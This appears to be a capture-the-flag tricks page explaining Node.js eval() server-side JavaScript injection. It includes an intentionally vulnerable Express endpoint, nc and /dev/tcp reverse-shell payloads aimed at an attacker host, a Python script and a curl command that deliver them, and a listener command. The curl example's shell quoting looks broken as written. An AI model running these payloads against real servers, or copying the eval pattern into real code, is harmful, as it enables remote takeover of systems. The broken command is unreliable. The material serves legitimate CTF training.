> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/rce/trick-0030.md).

# Nodejs Eval Server-Side JavaScript Injection RCE

***

The vulnerability lies in passing user input directly to `eval()` in a Node.js application, specifically observed in the `/time` endpoint processing the `time` parameter via `parseInt(eval(request.body.time))`. The `eval()` call happens before `parseInt`.

An example of such a vulnerable application snippet might look like this:

```javascript
const express = require('express');
const app = express();
app.use(express.json());
app.post('/time', (request, response) => {
  console.log(request.body.time);
  let time = parseInt(eval(request.body.time));
  response.send(`Current time plus ${time} is ${Date.now() + time}`);
});
app.listen(3000);
```

To achieve Remote Code Execution, inject JavaScript code that requires the `child_process` module and executes a system command using `exec()`. The `child_process` module has the capability to spawn child processes and execute commands. The `exec` function specifically runs a command in a shell.

A common payload for a reverse shell using Netcat is:

```javascript
require('child_process').exec('nc -e /bin/bash <ATTACKER_IP> 4444'); //
```

Alternatively, a common bash reverse shell payload using `/dev/tcp` can be used:

```javascript
require('child_process').exec('bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1'); //
```

This payload, when injected into the vulnerable parameter (e.g., the `time` parameter in a POST request to `/time`), will be evaluated by the server. The `require('child_process')` call loads the necessary module, `exec()` runs the specified command, and the `//` comments out any subsequent legitimate code on the server's line (like the closing parenthesis for `eval` or the `parseInt`).

Beyond reverse shells, other commands can be executed. For example, to execute the `whoami` command and write its output to a file:

```javascript
require('child_process').exec('whoami > /tmp/rce_test'); //
```

To send this payload, a simple script can be used. For example, using Python's `requests` library:

```python
import requests

url = "http://localhost:3000/time"
payload = {"time": "require('child_process').exec('nc -e /bin/bash 192.168.1.100 4444'); //"}

r = requests.post(url, json=payload)
print(r.text)
```

Alternatively, the payload can be sent using `curl`. Sending a POST request with curl containing a JSON body:

```bash
curl -X POST -H "Content-Type: application/json" -d '{"time":"require(\\'child_process\\').exec(\\'whoami > /tmp/output\\'); //"}' http://localhost:3000/time
```

Ensure a Netcat listener is running on the attacker machine at `<ATTACKER_IP>:4444` to catch the shell. This can typically be done using the command:

```bash
nc -lvnp 4444
```
